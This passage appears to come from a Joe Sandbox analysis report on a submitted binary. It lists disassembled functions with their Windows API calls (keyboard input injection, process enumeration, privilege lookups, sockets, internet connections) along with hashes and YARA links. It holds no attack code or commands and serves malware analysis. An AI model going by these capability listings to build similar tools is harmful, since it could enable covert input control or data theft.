VariantInit.OLEAUT32(?), ref: 001D688E
SysAllocString.OLEAUT32(00000000), ref: 001D6937
VariantCopy.OLEAUT32 ref: 001D6966
VariantClear.OLEAUT32(?), ref: 001D698D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 474d0785b1cff52a3da394b05fd5ff969543ad7ce8c68cbd5d46acb1e6711db5
Instruction ID: 551a52bdf6561e136eb3a729ef5b3e759ac1faa759269f9cfeba8ccf9b3a1e2e
Opcode Fuzzy Hash: 474d0785b1cff52a3da394b05fd5ff969543ad7ce8c68cbd5d46acb1e6711db5
Instruction Fuzzy Hash: 8051AF747007029EDB28AF65D895A3EB3E5AF59314F20D81FE5D6EB392DB70D8808B01

Function 002097F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0113EB20,?), ref: 00209863
ScreenToClient.USER32(00000002,00000002), ref: 00209896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00209903

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: b2759c0b05f47980a9bd2ad6f5e9b0fb51ab122aacd29f6648336fbdc6f6911f
Instruction ID: e1434991e0faefdc2a9077f4a84b23f52de47f0006b13a8d232655dd544a826d
Opcode Fuzzy Hash: b2759c0b05f47980a9bd2ad6f5e9b0fb51ab122aacd29f6648336fbdc6f6911f
Instruction Fuzzy Hash: AF515034A10309EFCF14CF54D984AAE7BB5FF55360F108159F8669B2A2D731AD91CB90

Function 001D9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 001D9AD2
__itow.LIBCMT ref: 001D9B03

Part of subcall function 001D9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 001D9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 001D9B6C
__itow.LIBCMT ref: 001D9BC3

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: b7cd2fbee3843be9b7727ec5e6fb7af3d88d837d0604f26db64a92cd8558d3ba
Instruction ID: 5c6937b4b438edfdda9084c501e32b3aba3cb3ddc1a9bec68b523bbcfed131b9
Opcode Fuzzy Hash: b7cd2fbee3843be9b7727ec5e6fb7af3d88d837d0604f26db64a92cd8558d3ba
Instruction Fuzzy Hash: 50419F74A00209ABDF21EF54D845FEE7FB9EF59724F00006AF905A7391DB709A44CBA1

Function 001F69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 001F69D1
WSAGetLastError.WSOCK32(00000000), ref: 001F69E1

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001F6A45
WSAGetLastError.WSOCK32(00000000), ref: 001F6A51

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 1d5c32155c290154e93e7b91dbf418401561d5946ba2940586a36f9ba1df0bc7
Instruction ID: 1cc597733ece8ff5f96ea9d23755d203c1e23bcb21cd12e11db8ec17ba33ba5b
Opcode Fuzzy Hash: 1d5c32155c290154e93e7b91dbf418401561d5946ba2940586a36f9ba1df0bc7
Instruction Fuzzy Hash: 5D41A275740204AFEB60BF64DC86F7A77A49B15B14F448118FA19AB2D3DB709E008B91

Function 001F641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0020F910), ref: 001F64A7
_strlen.LIBCMT ref: 001F64D9

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 0dcf50bfc69150cc6b264b38e78df29990cdaed50e7a838fd2888ae268f9c3f3
Instruction ID: 65b25a1993aa6e5d59d3994aff98f27de522c0e578f7b0d9bca159ec1f333176
Opcode Fuzzy Hash: 0dcf50bfc69150cc6b264b38e78df29990cdaed50e7a838fd2888ae268f9c3f3
Instruction Fuzzy Hash: 5F419775900108ABCB14FBA4EC95FBEB7A9EF68354F148155F919A72A2DB30AE04CB50

Function 001EB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001EB89E
GetLastError.KERNEL32(?,00000000), ref: 001EB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001EB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001EB915

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: b505d3f4ca9b87e0fd3dc0b961d3938028c48d44b6cade8963d46fafec9c317b
Instruction ID: 7e1251ef1f3424a4742d2a006090b39ea332a1e167f43081855480fc6455b1d4
Opcode Fuzzy Hash: b505d3f4ca9b87e0fd3dc0b961d3938028c48d44b6cade8963d46fafec9c317b
Instruction Fuzzy Hash: D1411839600A55DFCB10EF15C584A6EBBE1AF5A314F098098ED4A9B762CB30FE01DF91

Function 00208851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002088DE

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: dc1e9a7ef942c1606ec22c3b3a553acfd7b5c1e4990633cd300c2cd46ac6f274
Instruction ID: 7e138a9ab12a3d4ca742d4a1fa84cc654104454923c5b6c4410b7f47d273c6a0
Opcode Fuzzy Hash: dc1e9a7ef942c1606ec22c3b3a553acfd7b5c1e4990633cd300c2cd46ac6f274
Instruction Fuzzy Hash: 1731D43462031DEFEB20AE58DC49BBE77A5EB05310F944112FA91E63E3CE71D9609B52

Function 0020AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0020AB60
GetWindowRect.USER32(?,?), ref: 0020ABD6
PtInRect.USER32(?,?,0020C014), ref: 0020ABE6
MessageBeep.USER32(00000000), ref: 0020AC57

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: ee1c941361afe69974c056ab74c1a48bb61818a5390670a27dc0953283ad7470
Instruction ID: 6c79dd1159dae3c06c356870a4b93dc47c7ccd93ebd05825bc9fa243068dad5e
Opcode Fuzzy Hash: ee1c941361afe69974c056ab74c1a48bb61818a5390670a27dc0953283ad7470
Instruction Fuzzy Hash: CB41A034610319DFDB21DF58D888B997BF5FB49700F5580AAE8549B2A2D730E851CB92

Function 001E0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 001E0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 001E0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001E0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 001E0BFB

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: eb8570ad13c223e62b4f9dd535aca406a9ab7dd7c5151604df372d5572302d38
Instruction ID: 84244385bcf60671fe0dca7bc066c455d83f951da89d41b83dfad809acec43f2
Opcode Fuzzy Hash: eb8570ad13c223e62b4f9dd535aca406a9ab7dd7c5151604df372d5572302d38
Instruction Fuzzy Hash: 5F316634940B88AEFF368B278C09BFEBBA9BB5D318F48435AE481521D1C3F489C19751

Function 001E0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 001E0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 001E0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 001E0CE1
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 001E0D33

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 51b17713a02969e0f3ca1bb08c1b65a679c83086ba65c33f9b23ab4f4430a558
Instruction ID: 05ae6731ff9cbb353691d10477e6bbeb6a1c84035975c7bf0aa515a1de6ad8ec
Opcode Fuzzy Hash: 51b17713a02969e0f3ca1bb08c1b65a679c83086ba65c33f9b23ab4f4430a558
Instruction Fuzzy Hash: 9C314830940B886EFF368BA68C087FEBB66FB4D310F24435AE481521D1C3B99DC59752

Function 001B61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001B61FB
__isleadbyte_l.LIBCMT ref: 001B6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001B6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001B628D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f71ddce9f15302074ffc8a15987ff135c7a17855c6b9295d221fad846b3bd5fb
Instruction ID: 4688e3a689f9275279b149d02833d30693bcd245e041f49783e1915fcfadf960
Opcode Fuzzy Hash: f71ddce9f15302074ffc8a15987ff135c7a17855c6b9295d221fad846b3bd5fb
Instruction Fuzzy Hash: 4031D031600246AFEF218F69CC44BFA7BA9FF92310F154068F824971A1E734DD50DB90

Function 00204EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00204F02

Part of subcall function 001E3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001E365B
Part of subcall function 001E3641: GetCurrentThreadId.KERNEL32 ref: 001E3662
Part of subcall function 001E3641: AttachThreadInput.USER32(00000000,?,001E5005), ref: 001E3669

GetCaretPos.USER32(?), ref: 00204F13
ClientToScreen.USER32(00000000,?), ref: 00204F4E
GetForegroundWindow.USER32 ref: 00204F54

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: af2cf6d8c8e132d4fcf719c6212aec09f2e1dee26b8f9fc94eee13d700514a98
Instruction ID: c32522114317047861072dfc34fed05bdc18cbc44d0481e46574ca72ecbea004
Opcode Fuzzy Hash: af2cf6d8c8e132d4fcf719c6212aec09f2e1dee26b8f9fc94eee13d700514a98
Instruction Fuzzy Hash: 63312AB1D00209AFCB10EFA5C9859EFB7F9EF99304F10406AE515E7242EB719E058BA0

Function 001E3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 001E3C7A
Process32FirstW.KERNEL32(00000000,?), ref: 001E3C88
Process32NextW.KERNEL32(00000000,?), ref: 001E3CA8
CloseHandle.KERNEL32(00000000), ref: 001E3D52

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 2405637dfcbca7a82f9ace708a46a783dd7d99dacaaa167ec954a3d1a9aadf82
Instruction ID: 9697c69e1f4f3c676d3624b1f37bd49bdee5834405d64d3c3b7af0598c96bc16
Opcode Fuzzy Hash: 2405637dfcbca7a82f9ace708a46a783dd7d99dacaaa167ec954a3d1a9aadf82
Instruction Fuzzy Hash: 3231C0711083459FD310EF51D889AAFBBE8FFA5314F50082DF496871A1EB71DA49CB92

Function 0020C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623

GetCursorPos.USER32(?), ref: 0020C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001BB9AB,?,?,?,?,?), ref: 0020C4E7
GetCursorPos.USER32(?), ref: 0020C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001BB9AB,?,?,?), ref: 0020C56E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: ad62c9cc519a8d8b29db62df85c724d13a6cce4c4c70f6f77a540033d005d28f
Instruction ID: 182f0692a5228e1e04948f17c4ccd6935c62e7d4c1a4f9399e5a42083c37e000
Opcode Fuzzy Hash: ad62c9cc519a8d8b29db62df85c724d13a6cce4c4c70f6f77a540033d005d28f
Instruction Fuzzy Hash: 0E31F579510118AFCB25CF58DC58EEA7FB5EB09310F904165F8059B2A2C731AD60DFA0

Function 001D8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001D8121
Part of subcall function 001D810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001D812B
Part of subcall function 001D810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D813A
Part of subcall function 001D810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8141
Part of subcall function 001D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001D86A3
_memcmp.LIBCMT ref: 001D86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001D86FC
HeapFree.KERNEL32(00000000), ref: 001D8703

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: d19e12ab1779ae16487c30ba276ea9ac9a7572dd064a8bca310f778b87809e45
Instruction ID: 1d70f4f32b10f5ed42c89e539a6c1bb9b4d767fc6d695339b9971bc49ad66079
Opcode Fuzzy Hash: d19e12ab1779ae16487c30ba276ea9ac9a7572dd064a8bca310f778b87809e45
Instruction Fuzzy Hash: 0B214C72E44209EFDB10DFA8CA49BEEB7B8EF55315F15405AE444A7241EB31AE05CB50

Function 001A098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 001A09AE

Part of subcall function 00185A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,001E7896,?,?,00000000), ref: 00185A2C
Part of subcall function 00185A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,001E7896,?,?,00000000,?,?), ref: 00185A50

_fprintf.LIBCMT ref: 001A09E5
OutputDebugStringW.KERNEL32(?), ref: 001D5DBB

Part of subcall function 001A4AAA: _flsall.LIBCMT ref: 001A4AC3

__setmode.LIBCMT ref: 001A0A1A

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 93d02880738941a525d83b436ae93001c514d12495b891ece56ae3c2d709709f
Instruction ID: 20c546b764e32e3d6af1b2f52eb2e407570e1f0993d400cb4546c06390b9ee3a
Opcode Fuzzy Hash: 93d02880738941a525d83b436ae93001c514d12495b891ece56ae3c2d709709f
Instruction Fuzzy Hash: 57116A799046046FC708B3F4AC478FE77A9DFA7320F240016F10953182EFB0494297A0

Function 001F1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001F17A3

Part of subcall function 001F182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001F184C
Part of subcall function 001F182D: InternetCloseHandle.WININET(00000000), ref: 001F18E9

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: ba7bce5afd91b210a4a1bb65345d1656757fce9b061744d1025e7055708ab5c5
Instruction ID: 2565a4df74dd05486cf73379c4aa3b919fd12c13fa3001776b507a25f0dd9cf5
Opcode Fuzzy Hash: ba7bce5afd91b210a4a1bb65345d1656757fce9b061744d1025e7055708ab5c5
Instruction Fuzzy Hash: 0721D131240709FFEB269F60DD00FBABBA9FF88750F14412AFB0596661DB71981197A0

Function 001E3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0020FAC0), ref: 001E3A64
GetLastError.KERNEL32 ref: 001E3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 001E3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0020FAC0), ref: 001E3ADF

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
